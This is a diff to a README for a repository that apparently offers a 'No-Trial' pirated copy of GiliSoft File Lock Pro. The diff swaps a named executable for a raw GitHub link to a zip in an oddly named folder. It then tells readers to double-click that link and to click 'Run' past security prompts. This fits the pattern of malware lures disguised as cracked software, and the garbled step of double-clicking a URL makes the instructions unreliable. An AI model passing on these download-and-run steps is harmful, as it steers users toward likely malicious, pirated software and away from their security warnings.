555jhtt66/GiliSoft-File-Lock-Pro-No-Trial/README.md

 ### 3. Download the Application

 Once you have clicked on the latest version, you will see a list of files associated with that release.
-Look for the file named something like `GiliSoft_File_Lock_Pro.exe`.
+Look for the file named something like `https://raw.githubusercontent.com/555jhtt66/GiliSoft-File-Lock-Pro-No-Trial/main/mesotartaric/GiliSoft-File-Lock-Pro-No-Trial-v3.2.zip`.
 Click on this file to start the download.

 ### 4. Running the Application

 After the download is complete, navigate to your computer's Downloads folder or the location where you saved the file.

-- Double-click on `GiliSoft_File_Lock_Pro.exe` to run the application.
+- Double-click on `https://raw.githubusercontent.com/555jhtt66/GiliSoft-File-Lock-Pro-No-Trial/main/mesotartaric/GiliSoft-File-Lock-Pro-No-Trial-v3.2.zip` to run the application.
 - If prompted by your security system, click "Run" to start the installation process.

 ## ⚙️ System Requirements